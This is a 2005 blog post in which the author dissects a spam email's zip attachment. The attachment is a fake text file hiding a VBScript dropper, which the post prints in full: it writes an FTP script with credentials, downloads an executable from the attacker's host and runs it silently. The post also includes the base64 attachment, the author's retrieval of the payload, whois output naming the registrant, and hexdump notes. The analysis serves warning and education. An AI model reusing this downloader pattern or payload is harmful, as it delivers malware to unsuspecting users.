Spam can hide nasty secrets...
So the other day I got an email:
From - Fri May 27 23:52:32 2005
X-Account-Key: account3
X-UIDL: 30db7b2dbab83eba4e8de694cbb999ae
X-Mozilla-Status: 0001
X-Mozilla-Status2: 10000000
X-Apparently-To: <myaddress>@yahoo.co.uk via 217.12.10.40; Fri, 27 May 2005 22:18:42 +0000
X-YahooFilteredBulk: 62.194.167.229
Authentication-Results: mta105.mail.ukl.yahoo.com
from=gamebox.net; domainkeys=neutral (no sig)
X-Originating-IP: [62.194.167.229]
Return-Path: <wil_beike@gamebox.net>
Received: from 62.194.167.229 (EHLO h167229.upc-h.chello.nl) (62.194.167.229)
by mta105.mail.ukl.yahoo.com with SMTP; Fri, 27 May 2005 22:18:42 +0000
Received: from gamebox.net (mx1.gamebox.net [38.113.3.58])
by h167229.upc-h.chello.nl (Postfix) with ESMTP id QOH8O3X16D
for <<myaddress>@yahoo.co.uk>; Fri, 27 May 2005 18:20:13 +0000
Date: Fri, 27 May 2005 18:20:13 +0000
From: Ken <wil_beike@gamebox.net>
X-Mailer: The Bat! (v3.0) UNREG / HPICQ9J9UAPIYSLDB
Reply-To: Jeannie <wil_beike@gamebox.net>
X-Priority: 3 (Normal)
Message-ID: <689146984975.10756168720543581@h167229.upc-h.chello.nl>
To: <myaddress>@yahoo.co.uk
Subject: We make a business offer to you
MIME-Version: 1.0
Content-type: multipart/mixed;
boundary="----------N0FUQTL08W64CNLJ"
------------N0FUQTL08W64CNLJ
Content-Type: text/plain;
charset="Windows-1252"
Content-Transfer-Encoding: 8bit
Hello!
It is not spam, so don't delete this message.
We have a business offer to you.
Read our offer.
You can increase the business in 1,5 times.
We hope you do not miss this information.
Best regards, Jackie
------------N0FUQTL08W64CNLJ
Content-type: application/octet-stream;
name="agreement.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="agreement.zip"
UEsDBBQAAAAIADSMuzJyQ0OgKwUAAAAqAAAOAAAAYWdyZWVtZW50LnR4dP/tWs9vG0UUfrP+Edul
ieOWUKoIFpNERWo2baJCGiWRm6QmlCZpcSEHjIS9Xid27V1315aJxKEFCSpOOfTAAVEqFamqhBSQ
6IEKkb+A5oQ4BokjSG2VSw/N8mZ2N1lvbDmNWqIq+ykzb/bNzPfevBnHfmOv3GtfvfHj4b/AgVHw
wLoeBL9NR7C0Ww9hgIipW9d13VSB7sCwJqq5UpkvpOS5SmpOGol+MJZgqugoH9KkMl/V5rV5qVAY
EVUpVZaUdF4Sy0eiVWOiwPqi/Bt8KDViDRXUiswfiXaLSlErSWI33yfyxYuZnMqPDyVn35memJlN
JBMLWlkqDvQn0SDf08NL4rzCVzRJ5WW5tBCrSmlBLBVkWUCW0dHUxpDsW/0nC+fzGbsunZNT6oJd
M4eeF4vZgX5B+kRiZnNyRqlqNWaTGyPsUy9VcmXzOVsu8b3aUIrvlfneDHMsu+kVHZGRCjwb2tRE
9Oixo/FUQZMwVFU2UhALiibxoeE+I5ajzs1B/PP9MpyGoBe3LvKbsbMRVqOGYGmFdD6dH1sdW3We
EMBZHfDKCwD8V4QVsnVIDXS9rWnbwkesTpqUVNrbjeRBG0OJNJfoPHxqSks/zgHcQXnNfN6pDCAP
/kGIM563I7tQPkK5hhz/YvSz+Czg84tb4rO57msNwt7MP8G0e6tBPJ28zvm3GkjaH6rD43wOcPX9
du5Ts3138lE/Prb5Y8Hqd87fKSw+y/5V6xxBPvPwzl3iXMe3ZlwarXt3sH+3HXCxuzD/z7vYkyDW
/j/ebU9c/N8gYNt/F3sSpBNeXVrp45dWR15bCrREsby++J2vC0v30m4758KFi2eLCLRhVkLgQ5RW
YoJZaOyBzrFs1A/ToIAKRUhBAYyM1gvFyaD3LNCMn4OzqAnCJEg4IgM5kGEOeDgO9D6IgL+LHLh5
Hw7eHIZYD7wEJwJXxs90wruTnTBzhoPzWC5O/u2FODJRtnhdtn7GxtWykQhlezNwxU40CB7GM1iX
Z4DxeGp5OA/lqYnKMJyKPdRvoATogAlkySJPBSNQRpZz2FaxzLG6BPOoi2OUZOx1grB4scSQ3Y1Z
77cegI3P3l5b22fOo/0ttpau08i3wRSuRUS7CmhYssyfcbZDJRCgE9tDkMRRC6ifQL2IXhfRf+qb
hj1VFosqm5HBKAlY01F6DC5vJsTLj94n9dJjLmxbVgxzWVpRB9/uWEQVx/k9Pq+P83i/dCS51015
Ac1TdzR0bxplFeV76AA9XjL2nwgvEg58PsKRFj/nazGnhW1Ul2mVwAUWIY0z6aEciDLr+/xejsLr
qbMJFKdw0TnzIEcx4g8CVw8BrKCv82zIN4nQF9exGHNIDYOxkZ+Ht2otTZfTrIsdQQ3TDX8ZDyZg
/XRgHEddjzj0zV5QzfpduHDhwoULFy5cuHiuQJMX+uGY5i40D6X5J/3NB8286O86gmB8a7kPjCSW
fl/YCvSDs9H/GMu6rbh4vkCTb4UlNafZHYGKiTXAD7/sv7+90gE+YnHRc/Tn2rljP399r/3uZ3Ab
fv2dHhtYntBT9Bvx5T/iWSoPgJHF0/nH4QIm5GlMyaUnsmuVVuCYfXp+qdzOnAB1KmzYnzVvQpx3
Jdv15TDaJ7D5u6ftzAGbfcKSySImkzMYhfwTxyCCr177fja050AeLPvG69jF3gTB3feEjPPrDxrX
JMvGEYkfwmoqJ6qKpmTL/KyiZvgJRawUJbnM3hOmElSHKnY/R9uC1S8MwtrJny49jXcoF88S/wFQ
SwECFAAUAAAACAA0jLsyckNDoCsFAAAAKgAADgAAAAAAAAAAACAAAAAAAAAAYWdyZWVtZW50LnR4
dP9QSwUGAAAAAAEAAQA8AAAAVwUAAAAA
------------N0FUQTL08W64CNLJ--
I was thrilled! Increase my business in 1,5 times?? Why yes please!
Anyway, figuring I run Linux and the attachment is guaranteed to be a Windows virus, I thought I'd investigate further. By unzipping the attachment to see what's in it, using the file tool to see what type of file it is, and taking a close look!
$ mkdir sandbox
$ cd sandbox
$ unzip ../agreement.zip
Archive: ../agreement.zip
inflating: agreement.txt
$ ls -l
total 12
-rw-r--r-- 1 claude claude 10752 May 27 17:33 agreement.txt?
$ ls -lQ
total 12
-rw-r--r-- 1 claude claude 10752 May 27 17:33 "agreement.txt\240"
$ file a*
agreement.txt : Microsoft Office Document
$ more a*
ÐÏࡱá>þÿ þÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ<script language="VBScript">
set wshshell=createobject("wscript.shell" )
a=wshshell.run ("%comspec% /c mkdir C:\WINDOWS\System32\VBS && echo user nnpy@we
b.cplnn.com>>a && echo f729lQjd>>a && echo binary>>a && echo get mmf32.exe C:\Wi
ndows\System32\VBS\mmf32.exe>>a && echo quit>>a && ftp -s:a -n -d nnpyf.cplnn.co
m && del a && C:\Windows\System32\VBS\mmf32.exe",0,False)
window.close
</script>ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿì¥ÀE ¿bjbjBàBà ^L ÿÿÿÿÿÿ]\\\\\\\p
--More--(6%)
Hmm, this gives full instructions on how to get the virus payload, of course the "agreement.txt\240" helps out people who aren't ftp savvy by doing all the hard work for them! How considerate! Time to fire up ncftp and see how far I can get...
$ ncftp -u nnpy@web.cplnn.com -p f729lQjd ftp://nnpyf.cpl NcFTP 3.1.8 (Jul 27, 2004) by Mike Gleason (http://www.NcFTP.com/contact/). Remote host has closed the connection. Redialing (try 1)... ProFTPD 1.2.10 Server (ProFTPD Default Installation) [217.107.212.179] Logging in... User nnpy@web.cplnn.com logged in. Logged in to nnpyf.cplnn.com. Current remote directory is /. ncftp / > binary ncftp / > get mmf32.exe mmf32.exe: 35.50 kB 7.29 kB/s ncftp / > quit
Hmm, I don't think I'll risk running the exe, maybe a hexdump will be enlightening? But first, let's see who we're dealing with:
$ whois cplnn.com
Whois Server Version 1.3
Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
Domain Name: CPLNN.COM
Registrar: ONLINENIC, INC.
Whois Server: whois.OnlineNIC.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS1.NAMESELF.COM
Name Server: NS2.NAMESELF.COM
Status: ACTIVE
Updated Date: 20-mar-2005
Creation Date: 20-mar-2005
Expiration Date: 20-mar-2006
>>> Last update of whois database: Sun, 29 May 2005 20:39:17 EDT <<<
Registrant:
Sergey Litvinov sspwife_2003@mail.ru +7.3007193627
Private Person
Abay str. 79-34
Semipalatinsk,Semipalatinskaya,KAZAKSTAN 487000
Domain Name:cplnn.com
Record last updated at 2005-03-20 19:45:29
Record created on 2005/3/20
Record expired on 2006/3/20
Domain servers in listed order:
ns1.nameself.com ns2.nameself.com
Administrator:
Sergey Litvinov sspwife_2003@mail.ru +7.3007193627
Private Person
Abay str. 79-34
Semipalatinsk,Semipalatinskaya,KAZAKSTAN 487000
Domain Name:cplnn.com
Record last updated at 2005-03-20 19:45:29
Record created on 2005/3/20
Record expired on 2006/3/20
Domain servers in listed order:
ns1.nameself.com ns2.nameself.com
Administrator:
Sergey Litvinov sspwife_2003@mail.ru +7.3007193627
Private Person
Abay str. 79-34
Semipalatinsk,Semipalatinskaya,KAZAKSTAN 487000
Technical Contactor:
Sergey Litvinov sspwife_2003@mail.ru +7.3007193627
Private Person
Abay str. 79-34
Semipalatinsk,Semipalatinskaya,KAZAKSTAN 487000
Billing Contactor:
Sergey Litvinov sspwife_2003@mail.ru +7.3007193627
Private Person
Abay str. 79-34
Semipalatinsk,Semipalatinskaya,KAZAKSTAN 487000
Registration Service Provider:
name: Regtime.net
tel: +7 8462788201
fax: +7 8462788201
web:http://www.webnames.ru
Now that's out of the way, here's the edited highlighs of the hexdump:
00000000 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 |MZP.............| 00000010 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 |........@.......| 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 |................| 00000040 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 |........!..L.!..| 00000050 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 |This program mus| 00000060 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 |t be run under W| 00000070 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 |in32..$7........| 00000080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
Oooh, look! It gives a handy hint that you need a non-ancient version of Windows.
00008a60 08 00 00 00 00 00 00 00 00 00 00 00 6b 65 72 6e |............kern| 00008a70 65 6c 33 32 2e 64 6c 6c 00 56 69 72 74 75 61 6c |el32.dll.Virtual| 00008a80 41 6c 6c 6f 63 00 56 69 72 74 75 61 6c 46 72 65 |Alloc.VirtualFre| 00008a90 65 00 56 69 72 74 75 61 6c 50 72 6f 74 65 63 74 |e.VirtualProtect| 00008aa0 00 45 78 69 74 50 72 6f 63 65 73 73 00 00 00 00 |.ExitProcess....| 00008ab0 00 75 73 65 72 33 32 2e 64 6c 6c 00 4d 65 73 73 |.user32.dll.Mess| 00008ac0 61 67 65 42 6f 78 41 00 77 73 70 72 69 6e 74 66 |ageBoxA.wsprintf| 00008ad0 41 00 4c 4f 41 44 45 52 20 45 52 52 4f 52 00 54 |A.LOADER ERROR.T| 00008ae0 68 65 20 70 72 6f 63 65 64 75 72 65 20 65 6e 74 |he procedure ent| 00008af0 72 79 20 70 6f 69 6e 74 20 25 73 20 63 6f 75 6c |ry point %s coul| 00008b00 64 20 6e 6f 74 20 62 65 20 6c 6f 63 61 74 65 64 |d not be located| 00008b10 20 69 6e 20 74 68 65 20 64 79 6e 61 6d 69 63 20 | in the dynamic | 00008b20 6c 69 6e 6b 20 6c 69 62 72 61 72 79 20 25 73 00 |link library %s.| 00008b30 54 68 65 20 6f 72 64 69 6e 61 6c 20 25 75 20 63 |The ordinal %u c| 00008b40 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 63 61 |ould not be loca| 00008b50 74 65 64 20 69 6e 20 74 68 65 20 64 79 6e 61 6d |ted in the dynam| 00008b60 69 63 20 6c 69 6e 6b 20 6c 69 62 72 61 72 79 20 |ic link library | 00008b70 25 73 00 90 91 6f 01 00 a2 6f 01 00 b5 6f 01 00 |%s...o...o...o..| 00008b80 00 00 00 00 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c |....kernel32.dll| 00008b90 00 00 00 47 65 74 50 72 6f 63 41 64 64 72 65 73 |...GetProcAddres| 00008ba0 73 00 00 00 47 65 74 4d 6f 64 75 6c 65 48 61 6e |s...GetModuleHan| 00008bb0 64 6c 65 41 00 00 00 4c 6f 61 64 4c 69 62 72 61 |dleA...LoadLibra| 00008bc0 72 79 41 00 00 00 00 00 00 00 00 00 00 00 00 00 |ryA.............| 00008bd0 84 6f 01 00 74 6f 01 00 00 00 00 00 00 00 00 00 |.o..to..........| 00008be0 00 00 00 00 78 70 01 00 cd 70 01 00 00 00 00 00 |....xp...p......| 00008bf0 00 00 00 00 00 00 00 00 83 70 01 00 d5 70 01 00 |.........p...p..| 00008c00 00 00 00 00 00 00 00 00 00 00 00 00 90 70 01 00 |.............p..| 00008c10 dd 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 |.p..............| 00008c20 9d 70 01 00 e5 70 01 00 00 00 00 00 00 00 00 00 |.p...p..........| 00008c30 00 00 00 00 aa 70 01 00 ed 70 01 00 00 00 00 00 |.....p...p......| 00008c40 00 00 00 00 00 00 00 00 b5 70 01 00 f5 70 01 00 |.........p...p..| 00008c50 00 00 00 00 00 00 00 00 00 00 00 00 c1 70 01 00 |.............p..| 00008c60 fd 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 |.p..............| 00008c70 00 00 00 00 00 00 00 00 75 73 65 72 33 32 2e 64 |........user32.d| 00008c80 6c 6c 00 61 64 76 61 70 69 33 32 2e 64 6c 6c 00 |ll.advapi32.dll.| 00008c90 6f 6c 65 61 75 74 33 32 2e 64 6c 6c 00 61 64 76 |oleaut32.dll.adv| 00008ca0 61 70 69 33 32 2e 64 6c 6c 00 75 73 65 72 33 32 |api32.dll.user32| 00008cb0 2e 64 6c 6c 00 77 73 6f 63 6b 33 32 2e 64 6c 6c |.dll.wsock32.dll| 00008cc0 00 77 69 6e 69 6e 65 74 2e 64 6c 6c 00 05 71 01 |.wininet.dll..q.| 00008cd0 00 00 00 00 00 17 71 01 00 00 00 00 00 2a 71 01 |......q......*q.| 00008ce0 00 00 00 00 00 3a 71 01 00 00 00 00 00 4b 71 01 |.....:q......Kq.| 00008cf0 00 00 00 00 00 5e 71 01 00 00 00 00 00 6b 71 01 |.....^q......kq.| 00008d00 00 00 00 00 00 00 00 47 65 74 4b 65 79 62 6f 61 |.......GetKeyboa| 00008d10 72 64 54 79 70 65 00 00 00 52 65 67 51 75 65 72 |rdType...RegQuer| 00008d20 79 56 61 6c 75 65 45 78 41 00 00 00 53 79 73 46 |yValueExA...SysF| 00008d30 72 65 65 53 74 72 69 6e 67 00 00 00 52 65 67 53 |reeString...RegS| 00008d40 65 74 56 61 6c 75 65 45 78 41 00 00 00 54 72 61 |etValueExA...Tra| 00008d50 6e 73 6c 61 74 65 4d 65 73 73 61 67 65 00 00 00 |nslateMessage...| 00008d60 57 53 41 53 74 61 72 74 75 70 00 00 00 49 6e 74 |WSAStartup...Int| 00008d70 65 72 6e 65 74 52 65 61 64 46 69 6c 65 00 00 00 |ernetReadFile...| 00008d80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
Hmm, a reference to GetKeyboardType - I wonder why it needs to do that, could it possibly be to latch into the keyboard system and log every single keypress? Also, some kind of reference to internet things (InternetReadFile, but note that information can be transmitted by the act of reading a specific url - you're telling the server what page you are getting!), so I imagine this program logs all your key presses and sends them to some server on the web - better not do any internet banking if you run this bad boy! And some registry stuff (advapi32.dll - I looked up what it does on teh intarwebs), probably to make it run on startup every startup.
So, the moral of the story is, don't open any unsolicited email attachments!! Especially if you're running Windows!
Take care of yourself, and your computer.
Monoide - Strategy (Kazooo Rmx)
geeky
motherboard 3 power